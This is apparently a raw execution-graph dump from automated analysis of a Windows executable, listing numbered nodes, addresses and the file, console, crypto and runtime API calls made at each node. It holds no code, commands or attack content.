                                                            execution_graph 38232 7ff71d2b3e71 38233 7ff71d2b3e81 38232->38233 38234 7ff71d2b3e89 38232->38234 38243 7ff71d309a14 49 API calls 38233->38243 38236 7ff71d2b3edd 38234->38236 38237 7ff71d2b3ea3 38234->38237 38246 7ff71d30a610 38236->38246 38244 7ff71d2d331c 48 API calls 2 library calls 38237->38244 38241 7ff71d2b3eab 38241->38236 38245 7ff71d2b63e8 8 API calls 2 library calls 38241->38245 38243->38234 38244->38241 38245->38236 38247 7ff71d30a61a 38246->38247 38248 7ff71d2b3eef 38247->38248 38249 7ff71d30a6a0 IsProcessorFeaturePresent 38247->38249 38250 7ff71d30a6b7 38249->38250 38255 7ff71d30a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38250->38255 38252 7ff71d30a6ca 38256 7ff71d30a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38252->38256 38255->38252 38257 7ff71d2b82f0 38258 7ff71d2b8306 38257->38258 38270 7ff71d2b836f 38257->38270 38259 7ff71d2b8324 38258->38259 38263 7ff71d2b8371 38258->38263 38258->38270 38377 7ff71d2d2414 61 API calls 38259->38377 38261 7ff71d2b8347 38378 7ff71d2d1998 138 API calls 38261->38378 38263->38270 38386 7ff71d2d1998 138 API calls 38263->38386 38265 7ff71d2b835e 38379 7ff71d2d18ac 38265->38379 38280 7ff71d2ba410 38270->38280 38271 7ff71d2b8578 38272 7ff71d2bb540 147 API calls 38271->38272 38277 7ff71d2b858f 38272->38277 38273 7ff71d2bb540 147 API calls 38273->38271 38274 7ff71d2b8634 38275 7ff71d30a610 _handle_error 8 API calls 38274->38275 38276 7ff71d2b8663 38275->38276 38277->38274 38387 7ff71d2b9628 175 API calls 38277->38387 38388 7ff71d2e7a68 38280->38388 38283 7ff71d2b853a 38285 7ff71d2bb540 38283->38285 38289 7ff71d2bb55f setbuf 38285->38289 38286 7ff71d2bb5a1 38287 7ff71d2bb5d8 38286->38287 38288 7ff71d2bb5b8 38286->38288 38536 7ff71d2e8c1c 38287->38536 38422 7ff71d2baba0 38288->38422 38289->38286 38418 7ff71d2ba4d0 38289->38418 38291 7ff71d2bb5d3 38293 7ff71d30a610 _handle_error 8 API calls 38291->38293 38294 7ff71d2b854f 38293->38294 38294->38271 38294->38273 38295 7ff71d2bb6a5 38295->38291 38308 7ff71d2bb6b5 38295->38308 38327 7ff71d2bb79f 38295->38327 38296 7ff71d2bbbae 38299 7ff71d2e8d00 48 API calls 38296->38299 38298 7ff71d2d2574 126 API calls 38298->38291 38300 7ff71d2bbc5c 38299->38300 38605 7ff71d2e8d38 48 API calls 38300->38605 38304 7ff71d2bbc69 38606 7ff71d2e8d38 48 API calls 38304->38606 38307 7ff71d2bb67f 38307->38295 38307->38296 38315 7ff71d2bbc91 38307->38315 38308->38291 38570 7ff71d2e8d00 38308->38570 38309 7ff71d2bbc76 38607 7ff71d2e8d38 48 API calls 38309->38607 38311 7ff71d2bbc84 38608 7ff71d2e8d88 48 API calls 38311->38608 38315->38291 38315->38298 38317 7ff71d2bb726 38574 7ff71d2e8d38 48 API calls 38317->38574 38319 7ff71d2bb733 38320 7ff71d2bb749 38319->38320 38575 7ff71d2e8d88 48 API calls 38319->38575 38321 7ff71d2bb75c 38320->38321 38576 7ff71d2e8d38 48 API calls 38320->38576 38324 7ff71d2bb779 38321->38324 38326 7ff71d2e8d00 48 API calls 38321->38326 38577 7ff71d2e8f94 38324->38577 38326->38321 38328 7ff71d2bb8e5 38327->38328 38587 7ff71d2bc3c8 CharLowerW CharUpperW 38327->38587 38588 7ff71d2fd840 WideCharToMultiByte 38328->38588 38332 7ff71d2bb9a1 38334 7ff71d2e8d00 48 API calls 38332->38334 38335 7ff71d2bb9c4 38334->38335 38591 7ff71d2e8d38 48 API calls 38335->38591 38336 7ff71d2bb910 38336->38332 38590 7ff71d2b945c 55 API calls _handle_error 38336->38590 38338 7ff71d2bb9d1 38592 7ff71d2e8d38 48 API calls 38338->38592 38340 7ff71d2bb9de 38593 7ff71d2e8d88 48 API calls 38340->38593 38342 7ff71d2bb9eb 38594 7ff71d2e8d88 48 API calls 38342->38594 38344 7ff71d2bba0b 38345 7ff71d2e8d00 48 API calls 38344->38345 38346 7ff71d2bba27 38345->38346 38595 7ff71d2e8d88 48 API calls 38346->38595 38348 7ff71d2bba37 38349 7ff71d2bba49 38348->38349 38596 7ff71d2fbc48 15 API calls 38348->38596 38597 7ff71d2e8d88 48 API calls 38349->38597 38352 7ff71d2bba59 38353 7ff71d2e8d00 48 API calls 38352->38353 38354 7ff71d2bba66 38353->38354 38355 7ff71d2e8d00 48 API calls 38354->38355 38356 7ff71d2bba78 38355->38356 38598 7ff71d2e8d38 48 API calls 38356->38598 38358 7ff71d2bba85 38599 7ff71d2e8d88 48 API calls 38358->38599 38360 7ff71d2bba92 38361 7ff71d2bbacd 38360->38361 38600 7ff71d2e8d88 48 API calls 38360->38600 38602 7ff71d2e8e3c 38361->38602 38364 7ff71d2bbab2 38601 7ff71d2e8d88 48 API calls 38364->38601 38367 7ff71d2bbb33 38368 7ff71d2bbb53 38367->38368 38370 7ff71d2e8e3c 48 API calls 38367->38370 38371 7ff71d2bbb6e 38368->38371 38374 7ff71d2e8e3c 48 API calls 38368->38374 38369 7ff71d2e8d00 48 API calls 38372 7ff71d2bbb09 38369->38372 38370->38368 38375 7ff71d2e8f94 126 API calls 38371->38375 38372->38367 38373 7ff71d2e8e3c 48 API calls 38372->38373 38373->38367 38374->38371 38375->38291 38377->38261 38378->38265 38380 7ff71d2d18ca 38379->38380 38385 7ff71d2d18db 38379->38385 38381 7ff71d2d18d6 38380->38381 38382 7ff71d2d18de 38380->38382 38380->38385 38830 7ff71d2d1c24 38381->38830 38835 7ff71d2d1930 38382->38835 38385->38270 38386->38270 38387->38274 38390 7ff71d2e7a8d 38388->38390 38395 7ff71d2ba434 38388->38395 38389 7ff71d2e7aaf 38391 7ff71d2d22e0 12 API calls 38389->38391 38389->38395 38390->38389 38401 7ff71d2e7340 157 API calls 38390->38401 38393 7ff71d2e7adf 38391->38393 38402 7ff71d2d2440 38393->38402 38395->38283 38396 7ff71d2d22e0 38395->38396 38412 7ff71d2d20b4 38396->38412 38399 7ff71d2d2307 38399->38283 38401->38389 38403 7ff71d2d2454 38402->38403 38404 7ff71d2d246a SetFilePointer 38402->38404 38405 7ff71d2d24ad 38403->38405 38410 7ff71d2ccd00 10 API calls 38403->38410 38404->38405 38406 7ff71d2d248d GetLastError 38404->38406 38405->38395 38406->38405 38408 7ff71d2d2497 38406->38408 38408->38405 38411 7ff71d2ccd00 10 API calls 38408->38411 38413 7ff71d2d20d0 38412->38413 38416 7ff71d2d2130 38412->38416 38414 7ff71d2d2102 SetFilePointer 38413->38414 38415 7ff71d2d2126 GetLastError 38414->38415 38414->38416 38415->38416 38416->38399 38417 7ff71d2ccd00 10 API calls 38416->38417 38419 7ff71d2ba4ea 38418->38419 38420 7ff71d2ba4ee 38419->38420 38421 7ff71d2d2440 12 API calls 38419->38421 38420->38286 38421->38420 38423 7ff71d2babbf setbuf 38422->38423 38424 7ff71d2e8c1c 48 API calls 38423->38424 38430 7ff71d2babf5 38424->38430 38425 7ff71d2baca7 38426 7ff71d2bb4af 38425->38426 38427 7ff71d2bacbf 38425->38427 38431 7ff71d2bb4ff 38426->38431 38432 7ff71d2d2574 126 API calls 38426->38432 38428 7ff71d2bacc8 38427->38428 38429 7ff71d2bb35c 38427->38429 38437 7ff71d2bacdd 38428->38437 38476 7ff71d2baea7 38428->38476 38477 7ff71d2bad60 38428->38477 38434 7ff71d2e8eec 48 API calls 38429->38434 38430->38425 38430->38426 38609 7ff71d2c9be0 38430->38609 38649 7ff71d2e72c0 38431->38649 38432->38431 38436 7ff71d2bb395 38434->38436 38440 7ff71d2bb3ad 38436->38440 38648 7ff71d2b9e2c 48 API calls 38436->38648 38441 7ff71d2bace6 38437->38441 38442 7ff71d2bad68 38437->38442 38439 7ff71d2c90b8 75 API calls 38443 7ff71d2bac8f 38439->38443 38447 7ff71d2e8eec 48 API calls 38440->38447 38441->38477 38620 7ff71d2e8eec 38441->38620 38445 7ff71d2e8eec 48 API calls 38442->38445 38443->38425 38452 7ff71d2d2574 126 API calls 38443->38452 38448 7ff71d2bad9c 38445->38448 38446 7ff71d30a610 _handle_error 8 API calls 38449 7ff71d2bb52b 38446->38449 38450 7ff71d2bb3d4 38447->38450 38453 7ff71d2e8eec 48 API calls 38448->38453 38449->38291 38454 7ff71d2bb3e6 38450->38454 38457 7ff71d2e8eec 48 API calls 38450->38457 38452->38425 38456 7ff71d2bada9 38453->38456 38459 7ff71d2e8eec 48 API calls 38454->38459 38461 7ff71d2e8eec 48 API calls 38456->38461 38457->38454 38458 7ff71d2e8eec 48 API calls 38460 7ff71d2bad31 38458->38460 38462 7ff71d2bb451 38459->38462 38463 7ff71d2e8eec 48 API calls 38460->38463 38464 7ff71d2badb5 38461->38464 38465 7ff71d2bb471 38462->38465 38471 7ff71d2e8eec 48 API calls 38462->38471 38466 7ff71d2bad46 38463->38466 38467 7ff71d2e8eec 48 API calls 38464->38467 38469 7ff71d2bb486 38465->38469 38472 7ff71d2e8e3c 48 API calls 38465->38472 38468 7ff71d2e8f94 126 API calls 38466->38468 38470 7ff71d2badc2 38467->38470 38468->38477 38473 7ff71d2e8f94 126 API calls 38469->38473 38474 7ff71d2e8d00 48 API calls 38470->38474 38471->38465 38472->38469 38473->38477 38478 7ff71d2badcf 38474->38478 38475 7ff71d2bafda 38485 7ff71d2baff2 38475->38485 38639 7ff71d2b9d98 48 API calls 38475->38639 38476->38475 38638 7ff71d2b9b64 48 API calls _handle_error 38476->38638 38477->38446 38479 7ff71d2c90b8 75 API calls 38478->38479 38481 7ff71d2bae22 38479->38481 38483 7ff71d2e8e3c 48 API calls 38481->38483 38484 7ff71d2bae33 38483->38484 38486 7ff71d2e8e3c 48 API calls 38484->38486 38489 7ff71d2bb02b 38485->38489 38640 7ff71d2b9efc 48 API calls _handle_error 38485->38640 38487 7ff71d2bae48 38486->38487 38624 7ff71d2f9ce4 38487->38624 38488 7ff71d2bb0af 38491 7ff71d2bb0c8 38488->38491 38642 7ff71d2ba1a0 48 API calls 2 library calls 38488->38642 38489->38488 38641 7ff71d2ba2c8 48 API calls 38489->38641 38494 7ff71d2bb0e2 38491->38494 38643 7ff71d2ba350 48 API calls _handle_error 38491->38643 38498 7ff71d2e8eec 48 API calls 38494->38498 38500 7ff71d2bb0fc 38498->38500 38502 7ff71d2e8eec 48 API calls 38500->38502 38503 7ff71d2bb109 38502->38503 38505 7ff71d2bb11f 38503->38505 38507 7ff71d2e8eec 48 API calls 38503->38507 38504 7ff71d2e8e3c 48 API calls 38506 7ff71d2bae80 38504->38506 38634 7ff71d2e8e94 38505->38634 38509 7ff71d2e8f94 126 API calls 38506->38509 38507->38505 38509->38477 38511 7ff71d2e8eec 48 API calls 38512 7ff71d2bb147 38511->38512 38513 7ff71d2e8e94 48 API calls 38512->38513 38514 7ff71d2bb15f 38513->38514 38515 7ff71d2e8eec 48 API calls 38514->38515 38520 7ff71d2bb16c 38515->38520 38516 7ff71d2bb18a 38517 7ff71d2bb1a9 38516->38517 38645 7ff71d2e8d88 48 API calls 38516->38645 38519 7ff71d2e8e94 48 API calls 38517->38519 38521 7ff71d2bb1bc 38519->38521 38520->38516 38644 7ff71d2e8d88 48 API calls 38520->38644 38523 7ff71d2e8eec 48 API calls 38521->38523 38524 7ff71d2bb1d6 38523->38524 38526 7ff71d2bb1e9 38524->38526 38646 7ff71d2bc3c8 CharLowerW CharUpperW 38524->38646 38526->38526 38527 7ff71d2e8eec 48 API calls 38526->38527 38528 7ff71d2bb21f 38527->38528 38529 7ff71d2e8e3c 48 API calls 38528->38529 38530 7ff71d2bb230 38529->38530 38531 7ff71d2bb247 38530->38531 38532 7ff71d2e8e3c 48 API calls 38530->38532 38533 7ff71d2e8f94 126 API calls 38531->38533 38532->38531 38534 7ff71d2bb278 38533->38534 38534->38477 38647 7ff71d2e70d8 4 API calls 2 library calls 38534->38647 38690 7ff71d2e8f28 38536->38690 38539 7ff71d2c90b8 38540 7ff71d2c9123 38539->38540 38552 7ff71d2c91a9 38539->38552 38540->38552 38708 7ff71d2f7e74 38540->38708 38541 7ff71d30a610 _handle_error 8 API calls 38543 7ff71d2bb66e 38541->38543 38555 7ff71d2d2574 38543->38555 38545 7ff71d2fd840 WideCharToMultiByte 38546 7ff71d2c9157 38545->38546 38547 7ff71d2c91c4 38546->38547 38548 7ff71d2c916a 38546->38548 38546->38552 38727 7ff71d2c9338 12 API calls _handle_error 38547->38727 38549 7ff71d2c916f 38548->38549 38550 7ff71d2c91ab 38548->38550 38549->38552 38712 7ff71d2c98b0 38549->38712 38726 7ff71d2c951c 71 API calls _handle_error 38550->38726 38552->38541 38556 7ff71d2d25a5 38555->38556 38557 7ff71d2d259e 38555->38557 38558 7ff71d2d25ab GetStdHandle 38556->38558 38563 7ff71d2d25ba 38556->38563 38557->38307 38558->38563 38559 7ff71d2d2619 WriteFile 38559->38563 38560 7ff71d2d25cf WriteFile 38561 7ff71d2d260b 38560->38561 38560->38563 38561->38560 38561->38563 38562 7ff71d2d2658 GetLastError 38562->38563 38563->38557 38563->38559 38563->38560 38563->38562 38568 7ff71d2d2721 38563->38568 38824 7ff71d2d3144 9 API calls 2 library calls 38563->38824 38825 7ff71d2ccf34 10 API calls 38563->38825 38826 7ff71d2cc95c 126 API calls 38563->38826 38565 7ff71d2d2684 SetLastError 38565->38563 38827 7ff71d2ccf14 10 API calls 38568->38827 38571 7ff71d2b161c 48 API calls 38570->38571 38572 7ff71d2bb719 38571->38572 38573 7ff71d2e8d38 48 API calls 38572->38573 38573->38317 38574->38319 38575->38320 38576->38321 38578 7ff71d2e9131 38577->38578 38579 7ff71d2e8fcf 38577->38579 38578->38291 38585 7ff71d2e905d 38579->38585 38828 7ff71d2cca6c 48 API calls 3 library calls 38579->38828 38580 7ff71d2d2574 126 API calls 38580->38578 38581 7ff71d2b161c 48 API calls 38582 7ff71d2e90e0 38581->38582 38582->38578 38582->38580 38584 7ff71d2e904c 38829 7ff71d2cca40 61 API calls _CxxThrowException 38584->38829 38585->38581 38585->38582 38587->38328 38589 7ff71d2bb8f8 CharToOemA 38588->38589 38589->38336 38590->38332 38591->38338 38592->38340 38593->38342 38594->38344 38595->38348 38596->38349 38597->38352 38598->38358 38599->38360 38600->38364 38601->38361 38603 7ff71d2b161c 48 API calls 38602->38603 38604 7ff71d2bbaf2 38603->38604 38604->38367 38604->38369 38604->38372 38605->38304 38606->38309 38607->38311 38608->38315 38653 7ff71d2c901c CryptAcquireContextW 38609->38653 38613 7ff71d2c9c2a 38614 7ff71d2f9ce4 8 API calls 38613->38614 38615 7ff71d2c9c49 38614->38615 38616 7ff71d2f9b70 8 API calls 38615->38616 38617 7ff71d2c9c5b __BuildCatchObjectHelper 38616->38617 38618 7ff71d30a610 _handle_error 8 API calls 38617->38618 38619 7ff71d2bac34 38618->38619 38619->38439 38621 7ff71d2e8efc 38620->38621 38622 7ff71d2e8d00 48 API calls 38621->38622 38623 7ff71d2bad24 38621->38623 38622->38621 38623->38458 38625 7ff71d2bae60 38624->38625 38626 7ff71d2f9d15 __BuildCatchObjectHelper 38624->38626 38628 7ff71d2f9b70 38625->38628 38626->38625 38669 7ff71d2f9d74 38626->38669 38629 7ff71d2f9bad __scrt_fastfail 38628->38629 38633 7ff71d2f9bd9 __scrt_fastfail 38628->38633 38632 7ff71d2f9d74 8 API calls 38629->38632 38629->38633 38630 7ff71d2f9d74 8 API calls 38631 7ff71d2bae6d 38630->38631 38631->38504 38632->38633 38633->38630 38635 7ff71d2e8eac 38634->38635 38636 7ff71d2e8d00 48 API calls 38635->38636 38637 7ff71d2bb137 38635->38637 38636->38635 38637->38511 38638->38475 38639->38485 38640->38489 38641->38488 38642->38491 38643->38494 38644->38516 38645->38517 38646->38526 38647->38477 38648->38440 38650 7ff71d2e72dd 38649->38650 38651 7ff71d2e7304 38650->38651 38673 7ff71d30a480 38650->38673 38651->38477 38654 7ff71d2c907e 38653->38654 38655 7ff71d2c9057 CryptGenRandom CryptReleaseContext 38653->38655 38657 7ff71d2c9c9c 11 API calls 38654->38657 38655->38654 38656 7ff71d2c9089 38655->38656 38658 7ff71d2c9c9c 38656->38658 38657->38656 38663 7ff71d2fc0a8 GetSystemTime SystemTimeToFileTime 38658->38663 38660 7ff71d2c9cc5 38666 7ff71d312d74 38660->38666 38662 7ff71d2c9cd7 38662->38613 38662->38662 38664 7ff71d30a610 _handle_error 8 API calls 38663->38664 38665 7ff71d2fc0f1 38664->38665 38665->38660 38667 7ff71d312d8b QueryPerformanceCounter 38666->38667 38668 7ff71d312d87 38666->38668 38667->38668 38668->38662 38670 7ff71d2f9dbc 38669->38670 38670->38670 38671 7ff71d30a610 _handle_error 8 API calls 38670->38671 38672 7ff71d2f9f40 38671->38672 38672->38626 38678 7ff71d30a444 38673->38678 38674 7ff71d30a47a 38674->38651 38678->38674 38679 7ff71d3136c0 38678->38679 38682 7ff71d30b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38678->38682 38683 7ff71d30b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38678->38683 38684 7ff71d313700 38679->38684 38689 7ff71d316938 EnterCriticalSection 38684->38689 38686 7ff71d31370d 38687 7ff71d316998 fflush LeaveCriticalSection 38686->38687 38688 7ff71d3136d2 38687->38688 38688->38678 38693 7ff71d2b161c 38690->38693 38692 7ff71d2bb601 38692->38307 38692->38315 38692->38539 38694 7ff71d2b1640 38693->38694 38703 7ff71d2b16aa __BuildCatchObjectHelper 38693->38703 38695 7ff71d2b166d 38694->38695 38704 7ff71d2cca6c 48 API calls 3 library calls 38694->38704 38699 7ff71d2b16d4 38695->38699 38700 7ff71d2b168e 38695->38700 38697 7ff71d2b1661 38705 7ff71d2ccb64 8 API calls 38697->38705 38699->38703 38707 7ff71d2ccb64 8 API calls 38699->38707 38700->38703 38706 7ff71d2ccb64 8 API calls 38700->38706 38703->38692 38704->38697 38709 7ff71d2c9143 38708->38709 38710 7ff71d2f7e95 38708->38710 38709->38545 38728 7ff71d2f7ec8 38710->38728 38713 7ff71d2c9b45 38712->38713 38714 7ff71d2c9920 38712->38714 38715 7ff71d30a610 _handle_error 8 API calls 38713->38715 38718 7ff71d2c996d 38714->38718 38719 7ff71d2c9b75 38714->38719 38760 7ff71d2f7da8 38714->38760 38716 7ff71d2c9b61 38715->38716 38716->38552 38718->38718 38767 7ff71d2ca0f4 38718->38767 38721 7ff71d2f7f24 68 API calls 38719->38721 38723 7ff71d2c9acb 38721->38723 38722 7ff71d2c99d0 38722->38722 38783 7ff71d2f7f24 38722->38783 38723->38713 38723->38723 38797 7ff71d2f4ea8 8 API calls _handle_error 38723->38797 38726->38552 38727->38552 38730 7ff71d2f7efa __BuildCatchObjectHelper 38728->38730 38729 7ff71d2f7fb5 38732 7ff71d2f805c GetCurrentProcessId 38729->38732 38736 7ff71d2f7ff1 38729->38736 38730->38729 38742 7ff71d2fb3f0 38730->38742 38734 7ff71d2f8034 38732->38734 38734->38709 38735 7ff71d2f7f7e GetProcAddressForCaller GetProcAddress 38735->38729 38736->38734 38751 7ff71d2cca6c 48 API calls 3 library calls 38736->38751 38738 7ff71d2f801f 38752 7ff71d2ccda4 10 API calls 2 library calls 38738->38752 38740 7ff71d2f8027 38753 7ff71d2cca40 61 API calls _CxxThrowException 38740->38753 38754 7ff71d30a5a0 38742->38754 38745 7ff71d2fb42c 38756 7ff71d2e48bc 38745->38756 38746 7ff71d2fb428 38749 7ff71d30a610 _handle_error 8 API calls 38746->38749 38750 7ff71d2f7f72 38749->38750 38750->38729 38750->38735 38751->38738 38752->38740 38753->38734 38755 7ff71d2fb3fc GetSystemDirectoryW 38754->38755 38755->38745 38755->38746 38757 7ff71d2e48cb setbuf 38756->38757 38758 7ff71d30a610 _handle_error 8 API calls 38757->38758 38759 7ff71d2e493a LoadLibraryW 38758->38759 38759->38746 38761 7ff71d2f7e74 68 API calls 38760->38761 38762 7ff71d2f7ddc 38761->38762 38763 7ff71d2f7e74 68 API calls 38762->38763 38764 7ff71d2f7def 38763->38764 38765 7ff71d30a610 _handle_error 8 API calls 38764->38765 38766 7ff71d2f7e43 38765->38766 38766->38714 38771 7ff71d2ca15c __BuildCatchObjectHelper 38767->38771 38768 7ff71d2ca358 38820 7ff71d30a774 8 API calls __report_securityfailure 38768->38820 38770 7ff71d2ca352 38819 7ff71d30a774 8 API calls __report_securityfailure 38770->38819 38771->38768 38771->38770 38773 7ff71d2ca192 38771->38773 38774 7ff71d2ca34d 38771->38774 38772 7ff71d2ca35e 38798 7ff71d2c9dd8 38773->38798 38818 7ff71d30a774 8 API calls __report_securityfailure 38774->38818 38778 7ff71d2ca1d9 38779 7ff71d2c9dd8 8 API calls 38778->38779 38780 7ff71d2ca2f1 38778->38780 38779->38778 38781 7ff71d30a610 _handle_error 8 API calls 38780->38781 38782 7ff71d2ca33b 38781->38782 38782->38722 38784 7ff71d2f7f5e 38783->38784 38789 7ff71d2f7fb5 38783->38789 38785 7ff71d2fb3f0 10 API calls 38784->38785 38784->38789 38787 7ff71d2f7f72 38785->38787 38786 7ff71d2f805c GetCurrentProcessId 38788 7ff71d2f8034 38786->38788 38787->38789 38790 7ff71d2f7f7e GetProcAddressForCaller GetProcAddress 38787->38790 38788->38723 38789->38786 38791 7ff71d2f7ff1 38789->38791 38790->38789 38791->38788 38821 7ff71d2cca6c 48 API calls 3 library calls 38791->38821 38793 7ff71d2f801f 38822 7ff71d2ccda4 10 API calls 2 library calls 38793->38822 38795 7ff71d2f8027 38823 7ff71d2cca40 61 API calls _CxxThrowException 38795->38823 38797->38713 38799 7ff71d2c9e46 38798->38799 38801 7ff71d2c9e6e __scrt_fastfail 38798->38801 38800 7ff71d2f9ce4 8 API calls 38799->38800 38802 7ff71d2c9e5e 38800->38802 38804 7ff71d2c9e85 38801->38804 38806 7ff71d2f9ce4 8 API calls 38801->38806 38803 7ff71d2f9b70 8 API calls 38802->38803 38803->38801 38805 7ff71d2f9ce4 8 API calls 38804->38805 38807 7ff71d2c9f97 38805->38807 38806->38804 38808 7ff71d2f9b70 8 API calls 38807->38808 38809 7ff71d2c9fa8 __scrt_fastfail 38808->38809 38810 7ff71d2c9fb4 38809->38810 38812 7ff71d2f9ce4 8 API calls 38809->38812 38811 7ff71d2f9ce4 8 API calls 38810->38811 38813 7ff71d2ca0bb 38811->38813 38812->38810 38814 7ff71d2f9b70 8 API calls 38813->38814 38815 7ff71d2ca0c9 38814->38815 38816 7ff71d30a610 _handle_error 8 API calls 38815->38816 38817 7ff71d2ca0d8 38816->38817 38817->38778 38818->38770 38819->38768 38820->38772 38821->38793 38822->38795 38823->38788 38824->38565 38826->38563 38828->38584 38829->38585 38831 7ff71d2d1c3b 38830->38831 38832 7ff71d2d1c37 38830->38832 38831->38832 38833 7ff71d2d1c5d 38831->38833 38832->38385 38841 7ff71d2d2d6c 12 API calls 2 library calls 38833->38841 38836 7ff71d2d194c 38835->38836 38839 7ff71d2d1964 38835->38839 38838 7ff71d2d1958 FindCloseChangeNotification 38836->38838 38836->38839 38837 7ff71d2d1988 38837->38385 38838->38839 38839->38837 38842 7ff71d2cc9d0 10 API calls 38839->38842 38841->38832 38842->38837 38843 7ff71d2fa924 38845 7ff71d2fa949 sprintf 38843->38845 38844 7ff71d2fa97f CompareStringA 38845->38844 38846 7ff71d30b0fc 38865 7ff71d30aa8c 38846->38865 38850 7ff71d30b148 38855 7ff71d30b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38850->38855 38873 7ff71d31472c 38850->38873 38851 7ff71d30b123 __scrt_acquire_startup_lock 38851->38850 38921 7ff71d30b52c 7 API calls __scrt_fastfail 38851->38921 38854 7ff71d30b16d 38855->38854 38856 7ff71d30b1f7 38855->38856 38922 7ff71d312574 35 API calls __BuildCatchObjectHelper 38855->38922 38877 7ff71d313fc4 38856->38877 38863 7ff71d30b220 38923 7ff71d30ac64 8 API calls 2 library calls 38863->38923 38866 7ff71d30aaae __isa_available_init 38865->38866 38924 7ff71d30e2f8 38866->38924 38869 7ff71d30aab7 38869->38851 38920 7ff71d30b52c 7 API calls __scrt_fastfail 38869->38920 38875 7ff71d314744 38873->38875 38874 7ff71d314766 38874->38855 38875->38874 38973 7ff71d30b010 38875->38973 38878 7ff71d30b20c 38877->38878 38879 7ff71d313fd4 38877->38879 38881 7ff71d2e7e20 38878->38881 39065 7ff71d313c84 38879->39065 39105 7ff71d2fb470 GetModuleHandleW 38881->39105 38887 7ff71d2e7e58 SetErrorMode GetModuleHandleW 38888 7ff71d2f48cc 21 API calls 38887->38888 38889 7ff71d2e7e7d 38888->38889 38890 7ff71d2f3e48 137 API calls 38889->38890 38891 7ff71d2e7e90 38890->38891 38892 7ff71d2c3d3c 126 API calls 38891->38892 38893 7ff71d2e7e9c 38892->38893 38894 7ff71d30a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38893->38894 38895 7ff71d2e7ead 38894->38895 38896 7ff71d2e7ebf 38895->38896 38897 7ff71d2c3f18 70 API calls 38895->38897 38898 7ff71d2c4d1c 157 API calls 38896->38898 38897->38896 38899 7ff71d2e7ed6 38898->38899 38900 7ff71d2e7eef 38899->38900 38902 7ff71d2c6ad0 154 API calls 38899->38902 38901 7ff71d2c4d1c 157 API calls 38900->38901 38904 7ff71d2e7eff 38901->38904 38903 7ff71d2e7ee7 38902->38903 38905 7ff71d2c4e48 160 API calls 38903->38905 38906 7ff71d2e7f0d 38904->38906 38908 7ff71d2e7f14 38904->38908 38905->38900 38907 7ff71d2fb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38906->38907 38907->38908 38909 7ff71d2c4888 58 API calls 38908->38909 38910 7ff71d2e7f57 38909->38910 38911 7ff71d2c4fd0 268 API calls 38910->38911 38912 7ff71d2e7f5f 38911->38912 38913 7ff71d2e7f9e 38912->38913 38914 7ff71d2e7f8c 38912->38914 38918 7ff71d30b684 GetModuleHandleW 38913->38918 38915 7ff71d2fb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38914->38915 38916 7ff71d2e7f93 38915->38916 38916->38913 38917 7ff71d2fb57c 14 API calls 38916->38917 38917->38913 38919 7ff71d30b698 38918->38919 38919->38863 38920->38851 38921->38850 38922->38856 38923->38854 38925 7ff71d30e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38924->38925 38937 7ff71d30eb08 38925->38937 38929 7ff71d30e318 38930 7ff71d30aab3 38929->38930 38944 7ff71d30eb50 DeleteCriticalSection 38929->38944 38930->38869 38932 7ff71d3145e4 38930->38932 38933 7ff71d319d4c 38932->38933 38934 7ff71d30aac0 38933->38934 38961 7ff71d3166c0 38933->38961 38934->38869 38936 7ff71d30e32c 8 API calls 3 library calls 38934->38936 38936->38869 38939 7ff71d30eb10 38937->38939 38940 7ff71d30eb41 38939->38940 38941 7ff71d30e30b 38939->38941 38945 7ff71d30e678 38939->38945 38950 7ff71d30eb50 DeleteCriticalSection 38940->38950 38941->38930 38943 7ff71d30e8a4 8 API calls 3 library calls 38941->38943 38943->38929 38944->38930 38951 7ff71d30e34c 38945->38951 38948 7ff71d30e6cf InitializeCriticalSectionAndSpinCount 38949 7ff71d30e6bb 38948->38949 38949->38939 38950->38941 38952 7ff71d30e3b2 38951->38952 38957 7ff71d30e3ad 38951->38957 38952->38948 38952->38949 38953 7ff71d30e47a 38953->38952 38955 7ff71d30e489 GetProcAddress 38953->38955 38954 7ff71d30e3e5 LoadLibraryExW 38956 7ff71d30e40b GetLastError 38954->38956 38954->38957 38955->38952 38958 7ff71d30e4a1 38955->38958 38956->38957 38959 7ff71d30e416 LoadLibraryExW 38956->38959 38957->38952 38957->38953 38957->38954 38960 7ff71d30e458 FreeLibrary 38957->38960 38958->38952 38959->38957 38960->38957 38972 7ff71d316938 EnterCriticalSection 38961->38972 38963 7ff71d3166d0 38964 7ff71d318050 32 API calls 38963->38964 38966 7ff71d3166d9 38964->38966 38965 7ff71d3166e7 38968 7ff71d316998 fflush LeaveCriticalSection 38965->38968 38966->38965 38967 7ff71d3164d0 34 API calls 38966->38967 38969 7ff71d3166e2 38967->38969 38970 7ff71d3166f3 38968->38970 38971 7ff71d3165bc GetStdHandle GetFileType 38969->38971 38970->38933 38971->38965 38974 7ff71d30b020 pre_c_initialization 38973->38974 38994 7ff71d312b00 38974->38994 38976 7ff71d30b02c pre_c_initialization 39000 7ff71d30aad8 38976->39000 38978 7ff71d30b045 38979 7ff71d30b049 _RTC_Initialize 38978->38979 38980 7ff71d30b0b5 38978->38980 39005 7ff71d30ace0 38979->39005 39037 7ff71d30b52c 7 API calls __scrt_fastfail 38980->39037 38982 7ff71d30b0bf 39038 7ff71d30b52c 7 API calls __scrt_fastfail 38982->39038 38985 7ff71d30b05a pre_c_initialization 39008 7ff71d313b0c 38985->39008 38986 7ff71d30b0ca __scrt_initialize_default_local_stdio_options 38986->38875 38989 7ff71d30b06a 39036 7ff71d30b7dc RtlInitializeSListHead 38989->39036 38991 7ff71d30b06f pre_c_initialization 38992 7ff71d314818 pre_c_initialization 35 API calls 38991->38992 38993 7ff71d30b09a pre_c_initialization 38992->38993 38993->38875 38995 7ff71d312b11 38994->38995 38999 7ff71d312b19 38995->38999 39039 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 38995->39039 38997 7ff71d312b28 39040 7ff71d314e1c 31 API calls _invalid_parameter_noinfo 38997->39040 38999->38976 39001 7ff71d30ab96 39000->39001 39004 